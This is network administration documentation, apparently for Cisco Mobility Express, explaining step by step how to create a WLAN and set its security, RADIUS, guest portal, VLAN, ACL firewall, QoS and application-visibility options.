Step 1
|
Choose
.
The
WLAN
Configuration window is displayed.
|
Step 2
|
Click Add New WLAN.
The Add New WLAN window is displayed.
|
Step 3
|
Under the
General tab, set the following parameters:
-
WLAN ID—From the drop-down list, choose an ID number for this WLAN.
-
Profile Name— The profile name must be unique and should not exceed 32 characters.
-
SSID—The profile name also acts as the SSID. You can choose to specify an SSID that is different from the WLAN profile name. Like
the profile name, the SSID can not exceed 32 characters and must be unique.
-
Admin State—From the drop-down list, choose Enabled to enable this WLAN, else choose Disabled.
The default is Enabled.
-
Radio Policy—From the drop-down list, choose among the following options:
-
All—Configures the WLAN to support dual-band (2.4 GHz and 5 GHz) capable clients
-
2.4 GHz only—Configures the WLAN to support 802.11b/g/n capable clients only
-
5 GHz only—Configures the WLAN to support 802.11a/n/ac capable clients only
The radio policy allows you to optimize the RF settings for all the APs associated with a WLAN. The selected radio policy
applies to the 802.11 radios. Each radio policy specifies which part of the spectrum the WLAN is advertised on, whether it
is on 2.4 GHz, 5 GHz, or both.
-
Broadcast SSID—The default is Enabled. If you toggle it to make the SSID discoverable. Else, the SSID is hidden.
-
Local Profiling
|
Step 4
|
Under the
WLAN
Security tab, set one of the following security authentication
options from the
Security drop-down list:
- Open—This
option stands for Open authentication, which allows any device to authenticate
and then attempt to communicate with an AP. Using open authentication, any
wireless device can authenticate with the AP.
- Enhanced Open—The Enhanced Open feature is based on Opportunistic Wireless Encryption (OWE) and provides encryption to open (unencrypted)
wireless networks and a higher level of security against passive sniffing and simple attacks when compared to a public PSK
wireless network.
With Enhanced Open, clients and Mobility Express perform a Diffie-Hellman key exchange during the access procedure and use
the resulting pairwise secret with the 4-way handshake.
Enhanced Open requires no special configuration or user interaction, but provides better security than a common, shared, and
public PSK.
If you select Enhanced Open, you have the option to enable or disable OWE Transition Mode.
The OWE transition mode enables OWE and non-OWE STAs to connect to the same DS simultaneously. All the OWE STAs, when they
see an AP in OWE transition mode, connect it to OWE WLAN.
Both the WLANs, the open WLAN and the OWE WLAN, transmit beacon frames. Beacon and probe response frames from the OWE WLANs
include the Wi-Fi Alliance vendor IE to encapsulate the BSSID and SSID of the open WLAN.
OWE-capable STAs display only the SSID of the OWE WLAN (extracted from the Wi-Fi Alliance vendor IE in the open WLAN’s beacons
and probe responses) to the corresponding user in the list of available networks; display of the open WLAN is suppressed.
OWE-capable STAs associate only with the OWE WLAN of an AP in OWE transition mode.
OWE WLAN must have PMF as it is a mandatory configuration.
For more information about Enhanced Open, see the Wi-Fi Alliance's website.
- Personal—This WPA3 standard provides a replacement to the WPA2's PSK with Simultaneous Authentication of Equals (SAE), as defined
in the IEEE 802.11-2016 standard. With SAE, the user experience is the same (choose a passphrase to connect), but the SAE
automatically adds a step to the handshake, which makes brute force attacks ineffective. With SAE, the passphrase is not exposed, making it impossible for attackers
to find the passphrase through brute force dictionary attacks. The Protected Management Frames (PMF) are required to be used
for all WPA3-Personal connections. Previously, PMF was an optional capability for users. With WPA3, PMF must be negotiated
for all WPA3 connections that provide an additional layer of protection from deauthentication and disassociation attacks.
If you choose Personal, you will need to configure iPSK and a passphrase.
For more information about WPA3, see the the Wi-Fi Alliance's website.
Note
|
iPSK is not supported for SAE security; only common passphrase security association is supported.
|
-
WPA2
Enterprise—This option stands for Wi-Fi Protected Access 2, with a
local authentication server or a RADIUS server. This is the default option.
To have a local authentication method, choose AP in the Authentication Server drop-down list. This option is a Local EAP authentication method that allows users and wireless clients to be authenticated
locally. The controller in the primary AP serves as the authentication server and the local user database, which removes dependence
on an external authentication server.
To have a RADIUS server-based authentication method, choose External Radius in the Authentication Server drop-down list. RADIUS is a client/server protocol that enables communication with a central server to authenticate users
and authorize their access to the WLAN. You can specify up to two RADIUS authentication servers. For each server you need
to specify the following details:
-
RADIUS IP—IPv4 address of the RADIUS server.
-
RADIUS Port—Enter the communication port of the RADIUS server. The default value is 1812.
-
Shared Secret—Enter the secret key used by the RADIUS server, in ASCII format.
Note
|
-
You may configure multiple RADIUS authentication and accounting servers on the ME controller. However, only one port ID per
type can be used at any given time for all configured servers, including authentication, accounting, mail, and logs. This
port can be a default or a non-default number.
-
You can use either the default RADIUS port ID 1812 or a custom port ID, but ME supports only a single port ID at any given
time.
If you set up RADIUS server 1 with port ID "X" and if you add RADIUS server 2 with port ID "Y," server 1 with port ID "X"
will stop working, and only server 2 with port ID "Y" will function. To switch back to port ID "X," you must either add a
new server or remove and re-add the existing server with port ID "X." However, this action disables port ID "Y," rendering
it inactive.
|
-
Guest—The
controller can provide guest user access on WLANs which are specifically
designated for use by guest users. To set this WLAN exclusively for guest user
access, choose the
Security as
Guest.
You can set the authentication for guest users by choosing one of the following options in the Guest Type drop-down list:
-
WPA2 Personal—This option stands for Wi-Fi Protected Access 2 with pre-shared key (PSK). WPA2 Personal is a method used for securing your
network with the use of a PSK authentication. The PSK is configured separately both on the controller AP, under the WLAN security
policy, and on the client. WPA2 Personal does not rely on an authentication server on your network. This option is used when
you do not have an enterprise authentication server.
If you choose this option, then specify the PSK in the Passphrase field, and confirm it by specifying it again in the Confirm Passphrase field. The PSK you enter is hidden under asterisks for security purposes. Check the Show Passphrase checkbox to reveal it.
-
Captive Portal (AP)—Choose this option to set a captive portal which presents one of the following Captive Portal Types to users:
-
Require Username and Password—This is the default option. Choose this option to authenticate guests using the username and password which you can specify
for guest users of this WLAN, under Wireless Settings > WLAN Users. For more information, see Viewing and Managing WLAN Users.
-
Web Consent—Choose this option to allow guests access to the WLAN upon acceptance of displayed terms and conditions. This option allows
guest users to access the WLAN without entering a username and password.
-
Require Email Address—Choose this option, if you want guest users to be prompted for their e-mail address when attempting to access the WLAN. Upon
entering a valid email address, access it provided. This option allows guest users to access the WLAN without entering a username
and password.
-
Captive Portal (External Web Server)—Choose this option to have external captive portal authentication, using a web server outside your network. Also specify
the URL of the server in the Site URL field.
-
CMX Guest Connect—Choose this option to authenticate guests using the Cisco CMX Connect. Also, specify the URL of your CMX Cloud site in the
Site URL field.
|
Step 5
|
Under the
VLAN
& Firewall tab, in the
Use
VLAN Tagging drop-down list, choose
Yes to enable VLAN tagging of packets. Then, choose
a
VLAN
ID from the drop-down list, to use for the tagging. By default VLAN
Tagging is disabled.
By enabling
VLAN Tagging, the chosen VLAN ID is inserted into a packet header in order to
identify which VLAN (Virtual Local Area Network) the packet belongs to. This
enables the controller to use the VLAN ID to determine which VLAN to send a
broadcast packet to, thereby providing traffic separation between VLANs.
|
Step 6
|
If you have
chosen to enable VLAN Tagging, then you have an option to enable a firewall for
the WLAN based on Access Control Lists (ACLs). An ACL is a set of rules used to
limit access to a particular WLAN to control data traffic to and from wireless
clients or to the controller CPU to control all traffic destined for the CPU.
To enable an ACL-based firewall:
-
In the Enable Firewall drop-down list, choose Yes.
-
In the ACL Name field, enter a name for the new ACL. You can enter up to 32 alphanumeric characters. The ACL name must be unique.
-
Click Apply.
-
To set rules for the ACL, click Add Rule.
Note that ACL
rules are applied to the VLAN. Multiple WLANs can use the same VLAN, hence
inheriting ACL rules, if any.
Configure a rule for this ACL as follows:
-
From the Action drop-down list, choose Deny to cause this ACL to block packets or Permit to cause this ACL to allow packets. The default is Permit. The controller can permit or deny only IP packets in an ACL. Other
types of packets (such as ARP packets) cannot be specified.
-
From the Protocol drop-down list, choose the protocol ID of the IP packets to be used for this ACL. These are the protocol options:
-
Any—Any protocol (this is the default value)
-
TCP—Transmission Control Protocol
-
UDP—User Datagram Protocol
-
ICMP—Internet Control Message Protocol
ESP—IP Encapsulating Security Payload
-
AH—Authentication Header
-
GRE—Generic Routing Encapsulation
-
IP in IP—Internet Protocol (IP) in IP (permits or denies IP-in-IP packets)
-
Eth Over IP—Ethernet-over-Internet Protocol
-
OSPF—Open Shortest Path First
-
Other—Any other Internet Assigned Numbers Authority (IANA) protocol. If you choose Other, enter the number of the desired protocol
in the Protocol text box. You can find the list of available protocols in the IANA website.
-
In the Dest. IP/Mask field, enter the IP address and netmask of the specific destination.
-
If you have chosen TCP or UDP, you will need specify a Destination Port. This destination port can be used by applications that send and receive data to and from the networking stack. Some ports
are designated for certain applications such as Telnet, SSH, HTTP, and so on.
-
From the DSCP drop-down list, choose one of these options to specify the differentiated services code point (DSCP) value of this ACL. DSCP
is an IP header text box that can be used to define the quality of service across the Internet. You can choose:
-
Any—Any DSCP (this is the default value)
-
Specific—A specific DSCP from 0 to 63, which you enter in the DSCP edit box
-
Click the Apply icon to commit your changes.
|
Step 7
|
Quality of
service (QoS) refers to the capability of a network to provide better service
to selected network traffic over various technologies. The primary goal of QoS
is to provide priority, including dedicated bandwidth, controlled jitter and
latency (required by some real-time and interactive traffic), and improved loss
characteristics.
The Cisco Mobility Express controller supports the following four QoS levels. Under the QoS tab, from the QoS drop-down list, choose one of the following QoS levels:
-
Platinum (Voice)—Ensures a high quality of service for voice over wireless.
-
Gold (Video)—Supports high-quality video applications.
-
Silver (Best Effort)—Supports normal bandwidth for clients.
-
Bronze (Background)—Provides the lowest bandwidth for guest services.
|
Step 8
|
Application
Visibility classifies applications using the Network-Based
Application Recognition (NBAR2) engine, and provides application-level
visibility in wireless networks. Application Visibility enables the controller
to detect and recognize more than 1000 applications and perform real-time
analysis, and monitor network congestion and network link usage. This feature
contributes to the
Applications By Usage statistic in the
.
To enable
Application Visibility, choose
Enabled (the default option) from the
Application Visibility drop-down list. Otherwise,
choose
Disabled.
|
Step 9
|
Click
Apply.
|